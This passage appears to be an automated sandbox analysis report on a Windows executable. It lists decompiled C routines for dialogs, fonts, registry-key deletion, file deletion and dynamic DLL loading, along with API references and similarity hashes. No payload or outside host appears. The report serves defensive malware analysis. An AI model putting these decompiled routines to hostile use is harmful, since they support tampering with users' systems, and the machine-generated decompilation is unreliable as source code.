                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 26b0f60b404b7dd9810cf7406648eafe2108f7e7ac5a0eaa5579457d1e27eb68
                                                                                                                                    • Instruction ID: e4f74d6934390f2d90666ea578519db9a9ad75454a4f622c4e36c44a49969c70
                                                                                                                                    • Opcode Fuzzy Hash: 26b0f60b404b7dd9810cf7406648eafe2108f7e7ac5a0eaa5579457d1e27eb68
                                                                                                                                    • Instruction Fuzzy Hash: 8B217C72C00224ABDF217FA58D49DAE7E79EF05324B10823AF520762E0CB7959428F98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E00401D41(int __edx) {
                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                    				CHAR* _t30;
                                                                                                                                    				void* _t40;
                                                                                                                                    				void* _t44;
                                                                                                                                    				signed int _t46;
                                                                                                                                    				int _t50;
                                                                                                                                    				signed int _t53;
                                                                                                                                    				void* _t57;
                                                                                                                                    
                                                                                                                                    				_t48 = __edx;
                                                                                                                                    				if(( *(_t57 - 0x2b) & 0x00000001) == 0) {
                                                                                                                                    					_t24 = GetDlgItem( *(_t57 - 8), __edx);
                                                                                                                                    				} else {
                                                                                                                                    					_t24 = E00402B0A(1);
                                                                                                                                    					 *(_t57 - 0x10) = _t48;
                                                                                                                                    				}
                                                                                                                                    				_t46 =  *(_t57 - 0x2c);
                                                                                                                                    				 *(_t57 + 8) = _t24;
                                                                                                                                    				 *(_t57 - 8) = _t46 >> 0x1f;
                                                                                                                                    				_t50 = _t46 & 0x00000003;
                                                                                                                                    				_t53 = _t46 & 0x00000004;
                                                                                                                                    				 *(_t57 - 0x1c) = _t46 >> 0x0000001e & 0x00000001;
                                                                                                                                    				if((_t46 & 0x00010000) == 0) {
                                                                                                                                    					_t30 =  *(_t57 - 0x34) & 0x0000ffff;
                                                                                                                                    				} else {
                                                                                                                                    					_t30 = E00402B2C(_t44);
                                                                                                                                    				}
                                                                                                                                    				 *(_t57 - 0xc) = _t30;
                                                                                                                                    				GetClientRect( *(_t57 + 8), _t57 - 0x58);
                                                                                                                                    				asm("sbb esi, esi");
                                                                                                                                    				_t40 = SendMessageA( *(_t57 + 8), 0x172, _t50, LoadImageA( ~_t53 &  *0x42f420,  *(_t57 - 0xc), _t50,  *(_t57 - 0x50) *  *(_t57 - 8),  *(_t57 - 0x4c) *  *(_t57 - 0x1c),  *(_t57 - 0x2c) & 0x0000fef0));
                                                                                                                                    				if(_t40 != _t44 && _t50 == _t44) {
                                                                                                                                    					DeleteObject(_t40);
                                                                                                                                    				}
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t57 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}












                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: eadf5632f44844a23afe189e73ff426df31960e566c07d83677b8a65b624f51f
                                                                                                                                    • Instruction ID: 2c1095f692292a2db486c6c4b01e7c740380de91ab04b39c5b6a94773590f7c7
                                                                                                                                    • Opcode Fuzzy Hash: eadf5632f44844a23afe189e73ff426df31960e566c07d83677b8a65b624f51f
                                                                                                                                    • Instruction Fuzzy Hash: CF215172E00109AFDB05DF98DE44AEEBBB9FB58300F10413AF945F62A1DB789941CB58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E00401DFF(intOrPtr __edx) {
                                                                                                                                    				void* __esi;
                                                                                                                                    				int _t9;
                                                                                                                                    				signed char _t15;
                                                                                                                                    				struct HFONT__* _t18;
                                                                                                                                    				intOrPtr _t30;
                                                                                                                                    				struct HDC__* _t31;
                                                                                                                                    				void* _t33;
                                                                                                                                    				void* _t35;
                                                                                                                                    
                                                                                                                                    				_t30 = __edx;
                                                                                                                                    				_t31 = GetDC( *(_t35 - 8));
                                                                                                                                    				_t9 = E00402B0A(2);
                                                                                                                                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                                    				0x40b830->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                                                    				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                                                    				 *0x40b840 = E00402B0A(3);
                                                                                                                                    				_t15 =  *((intOrPtr*)(_t35 - 0x24));
                                                                                                                                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                                    				 *0x40b847 = 1;
                                                                                                                                    				 *0x40b844 = _t15 & 0x00000001;
                                                                                                                                    				 *0x40b845 = _t15 & 0x00000002;
                                                                                                                                    				 *0x40b846 = _t15 & 0x00000004;
                                                                                                                                    				E00406188(_t9, _t31, _t33, 0x40b84c,  *((intOrPtr*)(_t35 - 0x30)));
                                                                                                                                    				_t18 = CreateFontIndirectA(0x40b830);
                                                                                                                                    				_push(_t18);
                                                                                                                                    				_push(_t33);
                                                                                                                                    				E004060C4();
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}












                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401E02
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                                                                                    • ReleaseDC.USER32 ref: 00401E35
                                                                                                                                    • CreateFontIndirectA.GDI32(0040B830), ref: 00401E84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E00401C0A(intOrPtr __edx) {
                                                                                                                                    				int _t29;
                                                                                                                                    				long _t30;
                                                                                                                                    				signed int _t32;
                                                                                                                                    				CHAR* _t35;
                                                                                                                                    				long _t36;
                                                                                                                                    				int _t41;
                                                                                                                                    				signed int _t42;
                                                                                                                                    				int _t46;
                                                                                                                                    				int _t56;
                                                                                                                                    				intOrPtr _t57;
                                                                                                                                    				struct HWND__* _t61;
                                                                                                                                    				void* _t64;
                                                                                                                                    
                                                                                                                                    				_t57 = __edx;
                                                                                                                                    				_t29 = E00402B0A(3);
                                                                                                                                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                    				 *(_t64 - 8) = _t29;
                                                                                                                                    				_t30 = E00402B0A(4);
                                                                                                                                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                    				 *(_t64 + 8) = _t30;
                                                                                                                                    				if(( *(_t64 - 0x20) & 0x00000001) != 0) {
                                                                                                                                    					 *((intOrPtr*)(__ebp - 8)) = E00402B2C(0x33);
                                                                                                                                    				}
                                                                                                                                    				__eflags =  *(_t64 - 0x20) & 0x00000002;
                                                                                                                                    				if(( *(_t64 - 0x20) & 0x00000002) != 0) {
                                                                                                                                    					 *(_t64 + 8) = E00402B2C(0x44);
                                                                                                                                    				}
                                                                                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x38)) - 0x21;
                                                                                                                                    				_push(1);
                                                                                                                                    				if(__eflags != 0) {
                                                                                                                                    					_t59 = E00402B2C();
                                                                                                                                    					_t32 = E00402B2C();
                                                                                                                                    					asm("sbb ecx, ecx");
                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                    					_t35 =  ~( *_t31) & _t59;
                                                                                                                                    					__eflags = _t35;
                                                                                                                                    					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                                    					goto L10;
                                                                                                                                    				} else {
                                                                                                                                    					_t61 = E00402B0A();
                                                                                                                                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                    					_t41 = E00402B0A(2);
                                                                                                                                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                    					_t56 =  *(_t64 - 0x20) >> 2;
                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                    						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                                                                                    						L10:
                                                                                                                                    						 *(_t64 - 0xc) = _t36;
                                                                                                                                    					} else {
                                                                                                                                    						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - _t46;
                                                                                                                                    				if( *((intOrPtr*)(_t64 - 0x34)) >= _t46) {
                                                                                                                                    					_push( *(_t64 - 0xc));
                                                                                                                                    					E004060C4();
                                                                                                                                    				}
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}
















                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E00404A3D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                                    				char _v36;
                                                                                                                                    				char _v68;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed int _t21;
                                                                                                                                    				signed int _t22;
                                                                                                                                    				void* _t29;
                                                                                                                                    				void* _t31;
                                                                                                                                    				void* _t32;
                                                                                                                                    				void* _t41;
                                                                                                                                    				signed int _t43;
                                                                                                                                    				signed int _t47;
                                                                                                                                    				signed int _t50;
                                                                                                                                    				signed int _t51;
                                                                                                                                    				signed int _t53;
                                                                                                                                    
                                                                                                                                    				_t21 = _a16;
                                                                                                                                    				_t51 = _a12;
                                                                                                                                    				_t41 = 0xffffffdc;
                                                                                                                                    				if(_t21 == 0) {
                                                                                                                                    					_push(0x14);
                                                                                                                                    					_pop(0);
                                                                                                                                    					_t22 = _t51;
                                                                                                                                    					if(_t51 < 0x100000) {
                                                                                                                                    						_push(0xa);
                                                                                                                                    						_pop(0);
                                                                                                                                    						_t41 = 0xffffffdd;
                                                                                                                                    					}
                                                                                                                                    					if(_t51 < 0x400) {
                                                                                                                                    						_t41 = 0xffffffde;
                                                                                                                                    					}
                                                                                                                                    					if(_t51 < 0xffff3333) {
                                                                                                                                    						_t50 = 0x14;
                                                                                                                                    						asm("cdq");
                                                                                                                                    						_t22 = 1 / _t50 + _t51;
                                                                                                                                    					}
                                                                                                                                    					_t23 = _t22 & 0x00ffffff;
                                                                                                                                    					_t53 = _t22 >> 0;
                                                                                                                                    					_t43 = 0xa;
                                                                                                                                    					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                                                                    				} else {
                                                                                                                                    					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                                                                    					_t47 = 0;
                                                                                                                                    				}
                                                                                                                                    				_t29 = E00406188(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                                                                    				_t31 = E00406188(_t41, _t47, _t53,  &_v68, _t41);
                                                                                                                                    				_t32 = E00406188(_t41, _t47, 0x42a898, 0x42a898, _a8);
                                                                                                                                    				wsprintfA(_t32 + lstrlenA(0x42a898), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                                                                    				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a898);
                                                                                                                                    			}




















                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(0042A898,0042A898,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404958,000000DF,00000000,00000400,?), ref: 00404ADB
                                                                                                                                    • wsprintfA.USER32 ref: 00404AE3
                                                                                                                                    • SetDlgItemTextA.USER32 ref: 00404AF6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: 07b20e06a4e15d154d570ddcb83dacc27f88af3d06365e8a7daae3fc43d26942
                                                                                                                                    • Instruction ID: b6947819cf3d2f6237f51ad6bc4181ce5d30b763e3cace0042aa431f2da3fcd6
                                                                                                                                    • Opcode Fuzzy Hash: 07b20e06a4e15d154d570ddcb83dacc27f88af3d06365e8a7daae3fc43d26942
                                                                                                                                    • Instruction Fuzzy Hash: 6811B7736441283BDB0065A99C45EAF3298DB85374F250237FE26F61D1EA79CC2246ED
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405AFE(CHAR* _a4) {
                                                                                                                                    				CHAR* _t7;
                                                                                                                                    
                                                                                                                                    				_t7 = _a4;
                                                                                                                                    				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                                    					lstrcatA(_t7, 0x40a014);
                                                                                                                                    				}
                                                                                                                                    				return _t7;
                                                                                                                                    			}





                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403396,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00405B04
                                                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403396,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00405B0D
                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B1E
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                    • Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                                                                                    • Instruction ID: 4783a6558ad93634efccf2c5b59b7c2f7de2676992766bb99f9d95ab254c3fcf
                                                                                                                                    • Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                                                                                    • Instruction Fuzzy Hash: DCD0A9B2601A303ED2022615AC09ECB2A688F0B304B060027F240BA1A2CA3C1E5287FE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E0040206A(void* __ebx, void* __eflags) {
                                                                                                                                    				void* _t27;
                                                                                                                                    				struct HINSTANCE__* _t30;
                                                                                                                                    				CHAR* _t32;
                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                    				void* _t34;
                                                                                                                                    
                                                                                                                                    				_t27 = __ebx;
                                                                                                                                    				asm("sbb eax, 0x42f4f8");
                                                                                                                                    				 *(_t34 - 4) = 1;
                                                                                                                                    				if(__eflags < 0) {
                                                                                                                                    					_push(0xffffffe7);
                                                                                                                                    					L15:
                                                                                                                                    					E00401423();
                                                                                                                                    					L16:
                                                                                                                                    					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				_t32 = E00402B2C(0xfffffff0);
                                                                                                                                    				 *(_t34 + 8) = E00402B2C(1);
                                                                                                                                    				if( *((intOrPtr*)(_t34 - 0x24)) == __ebx) {
                                                                                                                                    					L3:
                                                                                                                                    					_t30 = LoadLibraryExA(_t32, _t27, 8);
                                                                                                                                    					if(_t30 == _t27) {
                                                                                                                                    						_push(0xfffffff6);
                                                                                                                                    						goto L15;
                                                                                                                                    					}
                                                                                                                                    					L4:
                                                                                                                                    					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                                    					if(_t33 == _t27) {
                                                                                                                                    						E0040528D(0xfffffff7,  *(_t34 + 8));
                                                                                                                                    					} else {
                                                                                                                                    						 *(_t34 - 4) = _t27;
                                                                                                                                    						if( *((intOrPtr*)(_t34 - 0x2c)) == _t27) {
                                                                                                                                    							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b870, 0x40a000);
                                                                                                                                    						} else {
                                                                                                                                    							E00401423( *((intOrPtr*)(_t34 - 0x2c)));
                                                                                                                                    							if( *_t33() != 0) {
                                                                                                                                    								 *(_t34 - 4) = 1;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					if( *((intOrPtr*)(_t34 - 0x28)) == _t27 && E00403923(_t30) != 0) {
                                                                                                                                    						FreeLibrary(_t30);
                                                                                                                                    					}
                                                                                                                                    					goto L16;
                                                                                                                                    				}
                                                                                                                                    				_t30 = GetModuleHandleA(_t32);
                                                                                                                                    				if(_t30 != __ebx) {
                                                                                                                                    					goto L4;
                                                                                                                                    				}
                                                                                                                                    				goto L3;
                                                                                                                                    			}









                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402095
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2987980305-0
                                                                                                                                    • Opcode ID: 2c41acbe1a58d5993be08d6f6e6b28b50d17c5afd77edb3e1c457816e7c537cb
                                                                                                                                    • Instruction ID: 1e62f077ed187e7b54f73df6e4690413272663ac282197ee05868da0157e3bc8
                                                                                                                                    • Opcode Fuzzy Hash: 2c41acbe1a58d5993be08d6f6e6b28b50d17c5afd77edb3e1c457816e7c537cb
                                                                                                                                    • Instruction Fuzzy Hash: 1B21C671900214ABCF11BFA4CF89AAE7974AF05358F20413BF511B62D0D6FD89829A1E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E00402C2E(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                                                                    				void* _v8;
                                                                                                                                    				char _v272;
                                                                                                                                    				void* _t19;
                                                                                                                                    				signed int _t25;
                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                    				signed int _t32;
                                                                                                                                    				signed int _t33;
                                                                                                                                    				signed int _t34;
                                                                                                                                    
                                                                                                                                    				_t33 = _a12;
                                                                                                                                    				_t34 = _t33 & 0x00000300;
                                                                                                                                    				_t32 = _t33 & 0x00000001;
                                                                                                                                    				_t19 = E00405FEC(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
                                                                                                                                    				if(_t19 == 0) {
                                                                                                                                    					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                                                    						__eflags = _t32;
                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                    							RegCloseKey(_v8);
                                                                                                                                    							return 0x3eb;
                                                                                                                                    						}
                                                                                                                                    						_t25 = E00402C2E(__eflags, _v8,  &_v272, _a12);
                                                                                                                                    						__eflags = _t25;
                                                                                                                                    						if(_t25 != 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					RegCloseKey(_v8);
                                                                                                                                    					_t27 = E004064FE(3);
                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                    						return RegDeleteKeyA(_a4, _a8);
                                                                                                                                    					}
                                                                                                                                    					return  *_t27(_a4, _a8, _t34, 0);
                                                                                                                                    				}
                                                                                                                                    				return _t19;
                                                                                                                                    			}












                                                                                                                                    APIs
                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$Enum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                    • Opcode ID: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                                                                                                    • Instruction ID: 0191349a5772dece43551cf2df1613e3fd7bf5efaca1991f01b23b14bf017e3e
                                                                                                                                    • Opcode Fuzzy Hash: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                                                                                                    • Instruction Fuzzy Hash: 1B116A32504109FBEF129F90DF09B9E7B6DEB14340F204036BD45B61E0E7B59E25AB68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E00405201(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                    				int _t15;
                                                                                                                                    				long _t16;
                                                                                                                                    
                                                                                                                                    				_t15 = _a8;
                                                                                                                                    				if(_t15 != 0x102) {
                                                                                                                                    					if(_t15 != 0x200) {
                                                                                                                                    						_t16 = _a16;
                                                                                                                                    						L7:
                                                                                                                                    						if(_t15 == 0x419 &&  *0x42a884 != _t16) {
                                                                                                                                    							_push(_t16);
                                                                                                                                    							_push(6);
                                                                                                                                    							 *0x42a884 = _t16;
                                                                                                                                    							E00404BC7();
                                                                                                                                    						}
                                                                                                                                    						L11:
                                                                                                                                    						return CallWindowProcA( *0x42a88c, _a4, _t15, _a12, _t16);
                                                                                                                                    					}
                                                                                                                                    					if(IsWindowVisible(_a4) == 0) {
                                                                                                                                    						L10:
                                                                                                                                    						_t16 = _a16;
                                                                                                                                    						goto L11;
                                                                                                                                    					}
                                                                                                                                    					_t16 = E00404B47(_a4, 1);
                                                                                                                                    					_t15 = 0x419;
                                                                                                                                    					goto L7;
                                                                                                                                    				}
                                                                                                                                    				if(_a12 != 0x20) {
                                                                                                                                    					goto L10;
                                                                                                                                    				}
                                                                                                                                    				E00404240(0x413);
                                                                                                                                    				return 0;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405230
                                                                                                                                    • CallWindowProcA.USER32 ref: 00405281
                                                                                                                                      • Part of subcall function 00404240: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404252
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
